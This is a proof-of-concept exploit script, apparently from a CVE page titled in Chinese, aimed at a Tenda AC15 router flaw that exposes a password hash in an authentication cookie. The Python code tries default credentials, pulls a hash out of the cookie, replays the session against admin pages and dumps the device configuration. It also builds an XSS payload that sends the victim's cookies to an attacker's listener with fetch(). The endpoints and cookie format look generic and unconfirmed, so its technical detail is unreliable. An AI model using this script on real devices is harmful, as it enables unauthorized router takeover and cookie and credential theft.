CVE-2025-63666 | Tenda AC15 认证Cookie密码哈希泄露漏洞

#!/usr/bin/env python3 # CVE-2025-63666 PoC - Tenda AC15 Authentication Cookie Hash Exposure # This PoC demonstrates the cookie stealing and replay attack import requests import hashlib import re from urllib.parse import urljoin def exploit_tenda_ac15(target_ip, attacker_cookie_listener=None): """ Exploit CVE-2025-63666 on Tenda AC15 router Args: target_ip: IP address of the vulnerable Tenda AC15 router attacker_cookie_listener: URL to receive stolen cookies (for XSS attack) """ base_url = f"http://{target_ip}" # Step 1: Try to get the authentication cookie print("[*] Step 1: Obtaining authentication cookie...") login_url = urljoin(base_url, "/login") # Attempt to login with default credentials credentials = [ ("admin", "admin"), ("admin", "password"), ("root", "root") ] session = requests.Session() valid_session = None for username, password in credentials: login_data = { "username": username, "password": password } try: response = session.post(login_url, data=login_data, timeout=5) if response.status_code == 200: cookies = session.cookies.get_dict() if cookies: print(f"[+] Logged in with {username}:{password}") print(f"[+] Cookie obtained: {cookies}") valid_session = session break except Exception as e: print(f"[-] Login attempt failed: {e}") if not valid_session: print("[-] Could not obtain valid session") return None # Step 2: Analyze the cookie for exposed password hash print("\n[*] Step 2: Analyzing cookie for password hash exposure...") cookie_str = str(valid_session.cookies.get_dict()) # The vulnerable cookie contains password hash in a specific format # Format: sessionID + low_entropy_suffix + password_hash hash_pattern = re.findall(r'[a-f0-9]{64}', cookie_str) if hash_pattern: print(f"[!] Password hash found in cookie: {hash_pattern[0]}") print("[!] This hash can be used for offline cracking or replay") # Step 3: Replay the cookie to access protected resources print("\n[*] Step 3: Replaying cookie to access protected resources...") protected_endpoints = [ "/admin/index.html", "/admin/system_status", "/admin/wireless_settings", "/admin/network_settings" ] for endpoint in protected_endpoints: try: response = valid_session.get(urljoin(base_url, endpoint), timeout=5) if response.status_code == 200: print(f"[+] Successfully accessed {endpoint}") if "password" in response.text.lower() or "admin" in response.text.lower(): print(f"[!] Sensitive data found in response from {endpoint}") else: print(f"[-] Access denied to {endpoint} (Status: {response.status_code})") except Exception as e: print(f"[-] Error accessing {endpoint}: {e}") # Step 4: Extract device configuration print("\n[*] Step 4: Extracting device configuration...") config_url = urljoin(base_url, "/admin/getConfig") try: response = valid_session.get(config_url, timeout=5) if response.status_code == 200: print(f"[+] Device configuration extracted:") print(response.text[:500]) except: pass return valid_session.cookies.get_dict() def generate_xss_payload(listener_url): """ Generate XSS payload for stealing cookies in victim's browser """ payload = f'''<script> fetch('{listener_url}?cookie=' + document.cookie); </script>''' return payload if __name__ == "__main__": import sys if len(sys.argv) < 2: print("Usage: python cve-2025-63666.py <target_ip>") print("Example: python cve-2025-63666.py 192.168.0.1") sys.exit(1) target = sys.argv[1] print(f"[*] Target: {target}") print(f"[*] Exploiting CVE-2025-63666\n") exploit_tenda_ac15(target)